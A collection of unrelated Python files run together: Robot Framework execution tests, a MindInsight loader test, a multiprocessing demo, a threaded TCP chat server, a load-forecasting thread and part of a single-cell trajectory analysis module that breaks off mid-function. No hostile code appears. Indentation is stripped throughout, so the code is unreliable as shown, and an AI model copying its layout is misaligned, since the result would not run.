assert exists(LOG_PATH)
def test_run_multiple_times(self):
assert_equal(rebot(self.data, outputdir=TEMP), 1)
assert_equal(rebot(self.data, outputdir=TEMP, name='New Name'), 1)
self._assert_outputs([(LOG, 2)])
def test_run_fails(self):
assert_equal(rebot(self.nonex), 252)
assert_equal(rebot(self.data, outputdir=TEMP), 1)
self._assert_outputs(stdout=[(LOG, 1)],
stderr=[('[ ERROR ]', 1), (self.nonex, (1, 2)),
('--help', 1)])
def test_custom_stdout(self):
stdout = StringIO()
assert_equal(rebot(self.data, report='None', stdout=stdout,
outputdir=TEMP), 1)
self._assert_output(stdout, [('Log:', 1), ('Report:', 0)])
self._assert_outputs()
def test_custom_stdout_and_stderr_with_minimal_implementation(self):
output = StreamWithOnlyWriteAndFlush()
assert_equal(rebot(self.data, log='NONE', report='NONE', stdout=output,
stderr=output), 252)
assert_equal(rebot(self.data, report='NONE', stdout=output,
stderr=output, outputdir=TEMP), 1)
self._assert_output(output, [('[ ERROR ] No outputs created', 1),
('--help', 1), ('Log:', 1), ('Report:', 0)])
self._assert_outputs()
def test_pre_rebot_modifier_as_instance(self):
class Modifier(SuiteVisitor):
def __init__(self):
self.tests = []
def visit_test(self, test):
self.tests.append(test.name)
test.status = 'FAIL'
modifier = Modifier()
assert_equal(rebot(self.data, outputdir=TEMP,
prerebotmodifier=modifier), 3)
assert_equal(modifier.tests, ['Test 1.1', 'Test 1.2', 'Test 2.1'])
def test_rebot_cli_system_exits_by_default(self):
exit = assert_raises(SystemExit, rebot_cli, ['-d', TEMP, self.data])
assert_equal(exit.code, 1)
def test_rebot_cli_optionally_returns_rc(self):
rc = rebot_cli(['-d', TEMP, self.data], exit=False)
assert_equal(rc, 1)
class TestStateBetweenTestRuns(RunningTestCase):
data = join(ROOT, 'atest', 'testdata', 'misc', 'normal.robot')
def test_importer_caches_are_cleared_between_runs(self):
self._run(self.data)
lib = self._import_library()
res = self._import_resource()
self._run(self.data)
assert_true(lib is not self._import_library())
assert_true(res is not self._import_resource())
def _run(self, data, rc=None, **config):
self._clear_outputs()
returned_rc = run_without_outputs(data, outputdir=TEMP, **config)
if rc is not None:
assert_equal(returned_rc, rc)
def _import_library(self):
return namespace.IMPORTER.import_library('BuiltIn', None, None, None)
def _import_resource(self):
resource = join(ROOT, 'atest', 'testdata', 'core', 'resources.robot')
return namespace.IMPORTER.import_resource(resource)
def test_clear_namespace_between_runs(self):
data = join(ROOT, 'atest', 'testdata', 'variables', 'commandline_variables.robot')
self._run(data, test=['NormalText'], variable=['NormalText:Hello'], rc=0)
self._run(data, test=['NormalText'], rc=1)
def test_reset_logging_conf(self):
assert_equal(logging.getLogger().handlers, [])
assert_equal(logging.raiseExceptions, 1)
self._run(join(ROOT, 'atest', 'testdata', 'misc', 'normal.robot'))
assert_equal(logging.getLogger().handlers, [])
assert_equal(logging.raiseExceptions, 1)
def test_listener_unregistration(self):
listener = join(ROOT, 'utest', 'resources', 'Listener.py')
self._run(self.data, listener=listener+':1', rc=0)
self._assert_outputs([("[from listener 1]", 1), ("[listener close]", 1)])
self._run(self.data, rc=0)
self._assert_outputs([("[from listener 1]", 0), ("[listener close]", 0)])
def test_rerunfailed_is_not_persistent(self):
# https://github.com/robotframework/robotframework/issues/2437
data = join(ROOT, 'atest', 'testdata', 'misc', 'pass_and_fail.robot')
self._run(data, output=OUTPUT_PATH, rc=1)
self._run(data, rerunfailed=OUTPUT_PATH, rc=1)
self._run(self.data, output=OUTPUT_PATH, rc=0)
assert_equal(rebot(OUTPUT_PATH, log=LOG_PATH, report=None), 0)
class TestTimestampOutputs(RunningTestCase):
output = join(TEMP, 'output-ts-*.xml')
report = join(TEMP, 'report-ts-*.html')
log = join(TEMP, 'log-ts-*.html')
remove_files = [output, report, log]
def test_different_timestamps_when_run_multiple_times(self):
self.run_tests()
output1, = self.find_results(self.output, 1)
report1, = self.find_results(self.report, 1)
log1, = self.find_results(self.log, 1)
self.wait_until_next_second()
self.run_tests()
output21, output22 = self.find_results(self.output, 2)
report21, report22 = self.find_results(self.report, 2)
log21, log22 = self.find_results(self.log, 2)
assert_equal(output1, output21)
assert_equal(report1, report21)
assert_equal(log1, log21)
def run_tests(self):
data = join(ROOT, 'atest', 'testdata', 'misc', 'pass_and_fail.robot')
assert_equal(run(data, timestampoutputs=True, outputdir=TEMP,
output='output-ts.xml', report='report-ts.html',
log='log-ts'), 1)
def find_results(self, pattern, expected):
matches = glob.glob(pattern)
assert_equal(len(matches), expected)
return sorted(matches)
def wait_until_next_second(self):
start = time.localtime()[5]
while time.localtime()[5] == start:
time.sleep(0.01)
class TestSignalHandlers(unittest.TestCase):
data = join(ROOT, 'atest', 'testdata', 'misc', 'pass_and_fail.robot')
def test_original_signal_handlers_are_restored(self):
orig_sigint = signal.getsignal(signal.SIGINT)
orig_sigterm = signal.getsignal(signal.SIGTERM)
my_sigterm = lambda signum, frame: None
signal.signal(signal.SIGTERM, my_sigterm)
try:
run_without_outputs(self.data, stdout=StringIO())
assert_signal_handler_equal(signal.SIGINT, orig_sigint)
assert_signal_handler_equal(signal.SIGTERM, my_sigterm)
finally:
signal.signal(signal.SIGINT, orig_sigint)
signal.signal(signal.SIGTERM, orig_sigterm)
def test_dont_register_signal_handlers_when_run_on_thread(self):
stream = StringIO()
thread = threading.Thread(target=run_without_outputs, args=(self.data,),
kwargs=dict(stdout=stream, stderr=stream))
thread.start()
thread.join()
output = stream.getvalue()
assert_true('ERROR' not in output.upper(), 'Errors:\n%s' % output)
class TestRelativeImportsFromPythonpath(RunningTestCase):
data = join(abspath(dirname(__file__)), 'import_test.robot')
def setUp(self):
self._orig_path = abspath(curdir)
chdir(ROOT)
sys.path.append(join('atest', 'testresources'))
def tearDown(self):
chdir(self._orig_path)
sys.path.pop()
def test_importing_library_from_pythonpath(self):
errors = StringIO()
run(self.data, outputdir=TEMP, stdout=StringIO(), stderr=errors)
self._assert_output(errors, '')
if __name__ == '__main__':
unittest.main()
|
test_explain_loader.py
|
# Copyright 2020 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""UT for explainer.manager.explain_manager"""
import os
import threading
import time
from unittest.mock import patch
from mindinsight.datavisual.data_access.file_handler import FileHandler
from mindinsight.explainer.manager.explain_loader import ExplainLoader
from mindinsight.explainer.manager.explain_loader import _LoaderStatus
from mindinsight.explainer.manager.explain_parser import ExplainParser
def abc():
FileHandler.is_file('aaa')
print('after')
class TestExplainLoader:
"""Test explain loader class."""
@patch.object(ExplainParser, 'list_events')
@patch.object(FileHandler, 'list_dir')
@patch.object(FileHandler, 'is_file')
@patch.object(os, 'stat')
def test_stop(self, mock_stat, mock_is_file, mock_list_dir, mock_list_events):
"""Test stop function."""
mock_is_file.return_value = True
mock_list_dir.return_value = ['events.summary.123.host_explain']
mock_list_events.return_value = (True, False, None)
class _MockStat:
def __init__(self, _):
self.st_ctime = 1
self.st_mtime = 1
self.st_size = 1
mock_stat.side_effect = _MockStat
loader = ExplainLoader(
loader_id='./summary_dir',
summary_dir='./summary_dir')
def _stop_loader(explain_loader):
time.sleep(0.01)
assert explain_loader.status == _LoaderStatus.LOADING.value
explain_loader.stop()
thread = threading.Thread(target=_stop_loader, args=[loader], daemon=True)
thread.start()
loader.load()
assert loader.status == _LoaderStatus.STOP.value
|
multiprocessing_1.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import multiprocessing
def my_worker():
print("Currently Executing Child Process")
print("This process has it's own instance of the GIL")
print("Executing Main Process")
print("Creating Child Process")
def main():
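    # Pass the worker function itself (not my_worker()) so it executes in the child process.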
    my_process = multiprocessing.Process(target=my_worker)
my_process.start()
my_process.join()
print("Child Process has terminated, terminating main process")
if __name__ == '__main__':
main()
|
server.py
|
import socketserver as ss
import threading
from socket import socket
from typing import Dict
from .ReqHandler import ReqHandler
class Server(ss.ThreadingTCPServer, ss.TCPServer):
"""
my socket server
"""
PORT = 20307
ADDR = '0.0.0.0'
running: bool = True
clients: Dict[str, ReqHandler] = {}
usernames: Dict[str, str] = {}
socket: socket
def __init__(self):
super().__init__( (self.ADDR, self.PORT), ReqHandler)
print('starting server')
self.Thread = threading.Thread(target=self.serve_forever, daemon=True)
self.Thread.start()
print('server started')
print(f'listening on {self.ADDR}:{self.PORT}')
def send(self, msg: str, sender: str):
raw_msg = msg.encode()
toRemove = []
for key, value in self.clients.items():
if key == sender:
continue
try:
value.send( msg=raw_msg )
except OSError:
toRemove.append( key )
for i in toRemove:
del self.clients[i]
if __name__ == '__main__':
with Server() as server:
try:
while True:
pass
except KeyboardInterrupt:
server.server_close()
server.socket.detach()
|
prediction.py
|
import datetime
import json
import os
import threading
import time
from queue import Queue
from optimization.forecastPublisher import ForecastPublisher
from prediction.errorReporting import ErrorReporting
from prediction.machineLearning import MachineLearning
from prediction.predictionDataManager import PredictionDataManager
from prediction.rawLoadDataReceiver import RawLoadDataReceiver
from utils_intern.constants import Constants
from utils_intern.timeSeries import TimeSeries
from utils_intern.utilFunctions import UtilFunctions
class Prediction(MachineLearning, threading.Thread):
"""
    - As soon as the number of data points reaches num_timesteps, prediction starts
    - If model_base.h5 is present on disk,
        then use model_base.h5,
        else load model_temp.h5 from disk (temporary pre-trained model)
    - Predict the next horizon points (e.g. 24 predictions)
"""
def __init__(self, config, control_frequency, horizon_in_steps, topic_name, topic_param, dT_in_seconds, id,
output_config, type, opt_values):
super(Prediction, self).__init__(config, horizon_in_steps, topic_name, dT_in_seconds, id, type, opt_values)
self.stopRequest = threading.Event()
self.control_frequency = 60
self.output_config = output_config
self.prediction_data_file_container = os.path.join("/usr/src/app", "prediction/resources", self.id,
"prediction_data_" + str(topic_name) + ".csv")
self.error_result_file_path = os.path.join("/usr/src/app", "prediction/resources", self.id,
"error_data_" + str(topic_name) + ".csv")
self.max_file_size_mins = config.getint("IO", str(self.type)+".raw.data.file.size", fallback=10800)
self.copy_prediction_file_data_to_influx()
total_mins = int(float(self.input_size * self.model_data_dT) / 60.0) + 1
self.raw_data = RawLoadDataReceiver(topic_param, config, total_mins,
self.raw_data_file_container, self.topic_name, self.id, True,
self.max_file_size_mins, self.influxDB)
self.q = Queue(maxsize=0)
forecast_topic = config.get("IO", "forecast.topic")
forecast_topic = json.loads(forecast_topic)
forecast_topic["topic"] = forecast_topic["topic"] + self.topic_name
self.forecast_pub = ForecastPublisher(forecast_topic, config, self.q,
60, self.topic_name, self.id,
self.horizon_in_steps, self.dT_in_seconds)
self.forecast_pub.start()
error_topic_params = config.get("IO", "error.topic")
error_topic_params = json.loads(error_topic_params)
error_topic_params["topic"] = error_topic_params["topic"] + self.topic_name
self.error_reporting = ErrorReporting(config, id, topic_name, dT_in_seconds, control_frequency,
horizon_in_steps, self.prediction_data_file_container,
self.raw_data_file_container, error_topic_params,
self.error_result_file_path, self.output_config, self.influxDB)
self.error_reporting.start()
self.old_predictions = []
self.prediction_save_thread = threading.Thread(target=self.save_to_file_cron)
self.prediction_save_thread.start()
def run(self):
while not self.stopRequest.is_set():
if not self.redisDB.get_bool(Constants.get_data_flow_key(self.id)):
time.sleep(30)
continue
try:
data = self.raw_data.get_raw_data()
self.logger.debug("len data = " + str(len(data)))
data = TimeSeries.expand_and_resample(data, 60)
self.logger.debug("len resample data = " + str(len(data)))
true_data = data
if len(data) > 0:
data = self.processingData.append_mock_data(data, self.input_size, 60)
self.logger.debug("len appended data = " + str(len(data)))
if len(data) > self.input_size:
st = time.time()
test_predictions = []
model, graph = self.models.get_model(self.id + "_" + self.topic_name, True, self.redisDB)
predicted_flag = False
if model is not None and graph is not None:
if self.type == "load":
Xtest, Xmax, Xmin, latest_timestamp = self.processingData.preprocess_data_predict_load(data,
self.input_size)
else:
Xtest, Xmax, Xmin, latest_timestamp = self.processingData.preprocess_data_predict_pv(data,
self.input_size,
self.input_size_hist)
try:
self.logger.debug(
"model present, so predicting data for " + str(self.id) + " " + str(self.topic_name))
from prediction.predictModel import PredictModel
predictModel = PredictModel(self.stop_request_status)
prediction_time = time.time()
test_predictions = predictModel.predict_next_horizon(model, Xtest, self.batch_size, graph, self.type)
self.logger.debug("Prediction successful for " + str(self.id) + " " + str(self.topic_name) +
" which took "+str(time.time()-prediction_time) + " seconds")
predicted_flag = True
except Exception as e:
predicted_flag = False
self.models.remove_saved_model()
self.logger.error("exception when prediction using model : " + str(e))
if predicted_flag:
test_predictions = self.processingData.postprocess_data(test_predictions, latest_timestamp,
self.dT_in_seconds,
self.horizon_in_steps, Xmax, Xmin)
self.logger.debug("predictions values Xmax "+str(Xmax)+" Xmin "+str(Xmin))
self.q.put(test_predictions)
self.old_predictions.append(test_predictions)
if not predicted_flag:
self.logger.info("prediction model is none, extending the known values")
data = TimeSeries.expand_and_resample(true_data, self.dT_in_seconds)
test_predictions = self.processingData.get_regression_values(data, self.input_size,
self.output_size + 1,
self.dT_in_seconds)
self.q.put(test_predictions)
self.logger.debug(str(self.topic_name) + " predictions " + str(len(test_predictions)))
st = time.time() - st
ss = self.control_frequency - st
if ss < 0:
ss = 0
time.sleep(ss)
else:
time.sleep(1)
except Exception as e:
self.logger.error(str(self.topic_name) + " prediction thread exception " + str(e))
def save_to_file_cron(self):
self.logger.debug("Started save file cron")
while True and not self.stopRequest.is_set():
self.old_predictions = PredictionDataManager.save_predictions_to_influx(self.influxDB,
self.old_predictions,
self.horizon_in_steps,
self.topic_name, self.id)
time.sleep(UtilFunctions.get_sleep_secs(1, 0, 0))
def copy_prediction_file_data_to_influx(self):
data_file = PredictionDataManager.get_prediction_data(self.prediction_data_file_container, self.topic_name)
if len(data_file) > 0:
data = PredictionDataManager.save_predictions_dict_to_influx(self.influxDB, data_file,
self.horizon_in_steps, self.topic_name, self.id)
if len(data) == 0:
PredictionDataManager.del_predictions_to_file(self.prediction_data_file_container, self.topic_name)
def Stop(self):
self.logger.info("start prediction thread exit")
if self.forecast_pub:
self.logger.info("Stopping load forecast thread")
self.forecast_pub.Stop()
if self.error_reporting:
self.error_reporting.Stop()
if self.raw_data:
self.raw_data.exit()
self.stopRequest.set()
if self.is_alive():  # Thread.isAlive() was removed in Python 3.9; use is_alive()
self.join(4)
self.logger.info("prediction thread exited")
def stop_request_status(self):
return self.stopRequest.is_set()
|
Viav022.py
|
import numpy as np
import pandas as pd
from scipy.sparse import csr_matrix, csgraph
import scipy
import igraph as ig
import leidenalg
import time
import hnswlib
import matplotlib.pyplot as plt
import matplotlib
import math
import multiprocessing
from scipy.sparse.csgraph import minimum_spanning_tree
from scipy import sparse
from sklearn.metrics.pairwise import euclidean_distances
import umap
import scanpy as sc
from MulticoreTSNE import MulticoreTSNE as TSNE
import random
from scipy.sparse.csgraph import connected_components
import pygam as pg
import matplotlib.colors as colors
import matplotlib.cm as cm
import palantir #/home/shobi/anaconda3/envs/ViaEnv/lib/python3.7/site-packages/palantir
from termcolor import colored
# jan2020 Right-click -> GIT -> Repository -> Push
def plot_sc_pb(ax, embedding, prob, ti):
#threshold = #np.percentile(prob, 95)#np.mean(prob) + 3 * np.std(prob)
#print('thresold', threshold, np.max(prob))
#prob = [x if x < threshold else threshold for x in prob]
prob = np.sqrt(prob)# scale values to improve visualization of colors
cmap = matplotlib.cm.get_cmap('viridis')
norm = matplotlib.colors.Normalize(vmin=0, vmax=np.max(prob))
prob = np.asarray(prob)
print('prob plot stats', min(prob), max(prob), np.mean(prob))
# changing the alpha transparency parameter for plotting points
c = cmap(norm(prob))
c = c.reshape(-1, 4)
loc_c = np.where(prob <= 0.3)[0]
c[loc_c, 3] = 0.2
loc_c = np.where((prob > 0.3) & (prob <= 0.5))[0]
c[loc_c, 3] = 0.5
loc_c = np.where((prob > 0.5) & (prob <= 0.7))[0]
c[loc_c, 3] = 0.8
loc_c = np.where((prob >0.7))[0]
c[loc_c, 3] = 0.8
ax.scatter(embedding[:, 0], embedding[:, 1], c=c, s=10, cmap='viridis',
edgecolors='none')
ax.set_title('Target: ' + str(ti))
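# Inverse-CDF sampling: draw the index of the next state from the categorical
# distribution given by vmultinomial (one row of transition probabilities).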
def simulate_multinomial(vmultinomial):
r = np.random.uniform(0.0, 1.0)
CS = np.cumsum(vmultinomial)
CS = np.insert(CS, 0, 0)
m = (np.where(CS < r))[0]
nextState = m[len(m) - 1]
return nextState
def sc_loc_ofsuperCluster_PCAspace(p0, p1,idx):
# ci_list: single cell location of average location of supercluster based on embedded space hnsw
#Returns location (index) in unsampled PCA space of the location of the super-cluster or sub-terminal-cluster and root
print("dict of terminal state pairs, Super: sub: ", p1.dict_terminal_super_sub_pairs)
p0_labels = np.asarray(p0.labels)
p1_labels = np.asarray(p1.labels)
p1_sc_markov_pt = p1.single_cell_pt_markov
ci_list = []
for ci in list(set(p0.labels)):
if ci in p1.revised_super_terminal_clusters: # p0.terminal_clusters:
loc_i = np.where(p1_labels == p1.dict_terminal_super_sub_pairs[ci])[0]
# loc_i = np.where(p0_labels == ci)[0]
# val_pt = [p1.single_cell_pt_markov[i] for i in loc_i]
val_pt = [p1_sc_markov_pt[i] for i in loc_i]
th_pt = np.percentile(val_pt, 0) # 80
loc_i = [loc_i[i] for i in range(len(val_pt)) if val_pt[i] >= th_pt]
temp = np.mean(p0.data[loc_i], axis=0)
labelsq, distances = p0.knn_struct.knn_query(temp, k=1)
ci_list.append(labelsq[0][0])
elif ci in p0.root:
loc_root = np.where(np.asarray(p0.root) == ci)[0][0]
print('loc root', loc_root)
p1_root_label = p1.root[loc_root]
loc_i = np.where(np.asarray(p1_labels) == p1_root_label)[0]
#print('loc_i', loc_i)
#print('len p1')
# loc_i = np.where(p0.labels == ci)[0]
val_pt = [p1_sc_markov_pt[i] for i in loc_i]
th_pt = np.percentile(val_pt, 20) # 50
loc_i = [loc_i[i] for i in range(len(val_pt)) if val_pt[i] <= th_pt]
temp = np.mean(p0.data[loc_i], axis=0)
labelsq, distances = p0.knn_struct.knn_query(temp, k=1)
ci_list.append(labelsq[0][0])
else:
# loc_i = np.where(np.asarray(p0.labels) == ci)[0]
loc_i = np.where(p0_labels == ci)[0]
temp = np.mean(p0.data[loc_i], axis=0)
labelsq, distances = p0.knn_struct.knn_query(temp, k=1)
ci_list.append(labelsq[0][0])
X_ds = p0.data[idx]
p_ds = hnswlib.Index(space='l2', dim=p0.data.shape[1])
p_ds.init_index(max_elements=X_ds.shape[0], ef_construction=200, M=16)
p_ds.add_items(X_ds)
p_ds.set_ef(50)
new_superclust_index_ds = []
for item in ci_list:
labelsq, distances = p_ds.knn_query(p0.data[item, :], k=1)
new_superclust_index_ds.append(labelsq[0][0])
return new_superclust_index_ds
def sc_loc_ofsuperCluster_embeddedspace(embedding, p0, p1, idx):
# ci_list: single cell location of average location of supercluster based on embedded space hnsw
# idx is the indices of the subsampled elements
knn_hnsw = hnswlib.Index(space='l2', dim=embedding.shape[1])
knn_hnsw.init_index(max_elements=embedding.shape[0], ef_construction=200, M=16)
knn_hnsw.add_items(embedding)
knn_hnsw.set_ef(50)
p0_labels = np.asarray(p0.labels)[idx]
p1_labels = np.asarray(p1.labels)[idx]
p1_sc_markov_pt = list(np.asarray(p1.single_cell_pt_markov)[idx])
ci_list = []
for ci in list(set(p0.labels)):
if ci in p1.revised_super_terminal_clusters: # p0.terminal_clusters:
loc_i = np.where(p1_labels == p1.dict_terminal_super_sub_pairs[ci])[0]
# loc_i = np.where(p0_labels == ci)[0]
# val_pt = [p1.single_cell_pt_markov[i] for i in loc_i]
val_pt = [p1_sc_markov_pt[i] for i in loc_i]
th_pt = np.percentile(val_pt, 80) # 50
loc_i = [loc_i[i] for i in range(len(val_pt)) if val_pt[i] >= th_pt]
x = [embedding[xi, 0] for xi in loc_i]
y = [embedding[yi, 1] for yi in loc_i]
elif ci in p0.root:
loc_root = np.where(np.asarray(p0.root) == ci)[0][0]
print('loc root', loc_root)
p1_root_label = p1.root[loc_root]
loc_i = np.where(np.asarray(p1_labels) == p1_root_label)[0]
#print('loc_i', loc_i)
#print('len p1')
# loc_i = np.where(p0.labels == ci)[0]
val_pt = [p1_sc_markov_pt[i] for i in loc_i]
th_pt = np.percentile(val_pt, 20) # 50
loc_i = [loc_i[i] for i in range(len(val_pt)) if val_pt[i] <= th_pt]
x = [embedding[xi, 0] for xi in loc_i]
y = [embedding[yi, 1] for yi in loc_i]
else:
# loc_i = np.where(np.asarray(p0.labels) == ci)[0]
loc_i = np.where(p0_labels == ci)[0]
# temp = np.mean(adata_counts.obsm['X_pca'][:, 0:ncomps][loc_i], axis=0)
x = [embedding[xi, 0] for xi in loc_i]
y = [embedding[yi, 1] for yi in loc_i]
labelsq, distancesq = knn_hnsw.knn_query(np.array([np.mean(x), np.mean(y)]), k=1)
# labels, distances = p.knn_query(temp, k=1)
ci_list.append(labelsq[0][0])
return knn_hnsw, ci_list
def draw_sc_evolution_trajectory_dijkstra(p1, embedding, knn_hnsw, G, idx, X_data):
# G is the igraph knn (low K) used for shortest path. no idx needed as it's made on full sample
# knn_hnsw is the knn made in the embedded space used for query
# X_data is the PCA space with all samples
# idx is the selected indices of the downsampled samples
y_root = []
x_root = []
root1_list = []
p1_sc_bp = p1.single_cell_bp[idx, :]
p1_labels = np.asarray(p1.labels)[idx]
p1_sc_pt_markov = list(np.asarray(p1.single_cell_pt_markov)[idx])
p1_cc = p1.connected_comp_labels
X_ds = X_data[idx, :]
p_ds = hnswlib.Index(space='l2', dim=X_ds.shape[1])
p_ds.init_index(max_elements=X_ds.shape[0], ef_construction=200, M=16)
p_ds.add_items(X_ds)
p_ds.set_ef(50)
for ii, r_i in enumerate(p1.root):
loc_i = np.where(p1_labels == p1.root[ii])[0]
x = [embedding[xi, 0] for xi in loc_i]
y = [embedding[yi, 1] for yi in loc_i]
labels_root, distances_root = knn_hnsw.knn_query(np.array([np.mean(x), np.mean(y)]),
k=1) # sc location in embedded space of root cell
x_root.append(embedding[labels_root, 0][0])
y_root.append(embedding[labels_root, 1][0])
labelsroot1, distances1 = p1.knn_struct.knn_query(X_ds[labels_root[0][0], :],
k=1) # index of sc-root-cell in the full-PCA space. Need for path
root1_list.append(labelsroot1[0][0])
# single-cell branch probability evolution probability
for i, ti in enumerate(p1.terminal_clusters):
#print('i, ti, p1.root, p1.connected', i, ti, p1.root, p1_cc)
#print('root1list', root1_list)
root_i = p1.root[p1_cc[ti]]
xx_root = x_root[p1_cc[ti]]
yy_root = y_root[p1_cc[ti]]
fig, ax = plt.subplots()
plot_sc_pb(ax, embedding, p1_sc_bp[:, i], ti)
loc_i = np.where(p1_labels == ti)[0]
val_pt = [p1_sc_pt_markov[i] for i in loc_i]
th_pt = np.percentile(val_pt, 50) # 50
loc_i = [loc_i[i] for i in range(len(val_pt)) if val_pt[i] >= th_pt]
x = [embedding[xi, 0] for xi in
loc_i] # location of sc nearest to average location of terminal clus in the EMBEDDED space
y = [embedding[yi, 1] for yi in loc_i]
labels, distances = knn_hnsw.knn_query(np.array([np.mean(x), np.mean(y)]),
k=1) # knn_hnsw is knn of embedded space
x_sc = embedding[labels[0], 0] # terminal sc location in the embedded space
y_sc = embedding[labels[0], 1]
start_time = time.time()
labelsq1, distances1 = p1.knn_struct.knn_query(X_ds[labels[0][0], :],
k=1) # find the nearest neighbor in the PCA-space full graph
print('labels root and labels[0]', root1_list[p1_cc[ti]], labels[0])
## path = G.get_shortest_paths(labels_root[0][0], to=labels[0][0], weights='weight') #G is the knn of all sc points
# path = G.get_shortest_paths(labelsroot1[0][0], to=labelsq1[0][0], weights='weight') # G is the knn of all sc points
path = G.get_shortest_paths(root1_list[p1_cc[ti]], to=labelsq1[0][0],
weights='weight') # G is the knn of all sc points
path_idx = [] # find the single-cell which is nearest to the average-location of a terminal cluster
# get the nearest-neighbor in this downsampled PCA-space graph. These will make the new path-way points
for pii in path[0]:
labelsq, distances = p_ds.knn_query(X_data[pii, :], k=1)
# print('location of pathway point in idx-space', labelsq[0][0])
path_idx.append(labelsq[0][0])
print(f"get_shortest_paths time: {time.time()-start_time}")
#print('path', path)
#print('new path indices', path_idx)
path = path_idx
n_orange = len(path)
orange_m = np.zeros((n_orange, 3))
for enum_point, point in enumerate(path):
#ax.text(embedding[point, 0], embedding[point, 1], 'D ' + str(enum_point), color='blue', fontsize=8)
orange_m[enum_point, 0] = embedding[point, 0]
orange_m[enum_point, 1] = embedding[point, 1]
orange_m[enum_point, 2] = p1_sc_pt_markov[ point]
from sklearn.neighbors import NearestNeighbors
k_orange = 3 # increasing can smoothen in simple trajectories (Toy)
nbrs = NearestNeighbors(n_neighbors=k_orange, algorithm='ball_tree').fit(orange_m[:, 0:])
distances, indices = nbrs.kneighbors(orange_m[:, 0:])
row_list = []
col_list = []
dist_list = []
for i_or in range(n_orange):
for j_or in range(1, k_orange):
row_list.append(i_or)
col_list.append(indices[i_or, j_or])
dist_list.append(distances[i_or, j_or])
print('target number ' + str(ti))
orange_adjacency_knn = csr_matrix((np.array(dist_list), (np.array(row_list), np.array(col_list))),
shape=(n_orange, n_orange))
print('orange adj knn shape', orange_adjacency_knn.shape)
n_mst, comp_labels_mst = connected_components(csgraph=orange_adjacency_knn, directed=False, return_labels=True)
for enum_point, point in enumerate(path): # [0]):
orange_m[enum_point, 2] = p1_sc_pt_markov[point] * p1_sc_pt_markov[
point] * 2 # p1.single_cell_pt_markov[point] * p1.single_cell_pt_markov[point]*2
while n_mst > 1:
comp_root = comp_labels_mst[0]
# print('comp-root', comp_root)
min_ed = 9999999
loc_comp_i = np.where(comp_labels_mst == comp_root)[0]
loc_comp_noti = np.where(comp_labels_mst != comp_root)[0]
# print('compi', loc_comp_i)
# print('comp_noti', loc_comp_noti)
orange_pt_val = [orange_m[cc, 2] for cc in loc_comp_i]
loc_comp_i_revised = [loc_comp_i[cc] for cc in range(len(orange_pt_val)) if
orange_pt_val[cc] >= np.percentile(orange_pt_val, 70)]
for nn_i in loc_comp_i_revised:
ed = euclidean_distances(orange_m[nn_i, :].reshape(1, -1), orange_m[loc_comp_noti])
if np.min(ed) < min_ed:
ed_where_min = np.where(ed[0] == np.min(ed))[0][0]
# print('ed where min', ed_where_min, np.where(ed[0] == np.min(ed)))
min_ed = np.min(ed)
ed_loc_end = loc_comp_noti[ed_where_min]
ed_loc_start = nn_i
# print('min ed', min_ed)
print('Connecting components before sc-bp-GAM: the closest pair of points', ed_loc_start, ed_loc_end)
orange_adjacency_knn[ed_loc_start, ed_loc_end] = min_ed
n_mst, comp_labels_mst = connected_components(csgraph=orange_adjacency_knn, directed=False,
return_labels=True)
if n_mst == 1: #if no disconnected components in the graph
(orange_sources, orange_targets) = orange_adjacency_knn.nonzero()
orange_edgelist = list(zip(orange_sources.tolist(), orange_targets.tolist()))
G_orange = ig.Graph(n=orange_adjacency_knn.shape[0], edges=orange_edgelist,
edge_attrs={'weight': orange_adjacency_knn.data.tolist()}, )
path_orange = G_orange.get_shortest_paths(0, to=orange_adjacency_knn.shape[0] - 1, weights='weight')[0]
print('path orange', path_orange)
len_path_orange = len(path_orange)
for path_i in range(len_path_orange - 1):
path_x_start = orange_m[path_orange[path_i], 0]
path_x_end = orange_m[path_orange[path_i + 1], 0]
orange_x = [orange_m[path_orange[path_i], 0], orange_m[path_orange[path_i + 1], 0]]
orange_minx = min(orange_x)
orange_maxx = max(orange_x)
orange_y = [orange_m[path_orange[path_i], 1], orange_m[path_orange[path_i + 1], 1]]
orange_miny = min(orange_y)
orange_maxy = max(orange_y)
orange_embedding_sub = embedding[
((embedding[:, 0] <= orange_maxx) & (embedding[:, 0] >= orange_minx)) & (
(embedding[:, 1] <= orange_maxy) & ((embedding[:, 1] >= orange_miny)))]
if (orange_maxy - orange_miny > 5) | (orange_maxx - orange_minx > 5):
orange_n_reps = 150
else:
orange_n_reps = 100
or_reps = np.repeat(np.array([[orange_x[0], orange_y[0]]]), orange_n_reps, axis=0)
orange_embedding_sub = np.concatenate((orange_embedding_sub, or_reps), axis=0)
or_reps = np.repeat(np.array([[orange_x[1], orange_y[1]]]), orange_n_reps, axis=0)
orange_embedding_sub = np.concatenate((orange_embedding_sub, or_reps), axis=0)
orangeGam = pg.LinearGAM(n_splines=8, spline_order=3, lam=10).fit(orange_embedding_sub[:, 0],
orange_embedding_sub[:, 1])
nx_spacing = 100
orange_GAM_xval = np.linspace(orange_minx, orange_maxx, nx_spacing * 2)
yg_orange = orangeGam.predict(X=orange_GAM_xval)
ax.plot(orange_GAM_xval, yg_orange, color='dimgrey', linewidth=2, zorder=3, linestyle=(0, (5, 2, 1, 2)),
dash_capstyle='round')
cur_x1 = orange_GAM_xval[-1]
cur_y1 = yg_orange[-1]
cur_x2 = orange_GAM_xval[0]
cur_y2 = yg_orange[0]
if path_i >= 1:
for mmddi in range(2):
xy11 = euclidean_distances(np.array([cur_x1, cur_y1]).reshape(1, -1),
np.array([prev_x1, prev_y1]).reshape(1, -1))
xy12 = euclidean_distances(np.array([cur_x1, cur_y1]).reshape(1, -1),
np.array([prev_x2, prev_y2]).reshape(1, -1))
xy21 = euclidean_distances(np.array([cur_x2, cur_y2]).reshape(1, -1),
np.array([prev_x1, prev_y1]).reshape(1, -1))
xy22 = euclidean_distances(np.array([cur_x2, cur_y2]).reshape(1, -1),
np.array([prev_x2, prev_y2]).reshape(1, -1))
mmdd_temp_array = np.asarray([xy11, xy12, xy21, xy22])
mmdd_loc = np.where(mmdd_temp_array == np.min(mmdd_temp_array))[0][0]
if mmdd_loc == 0:
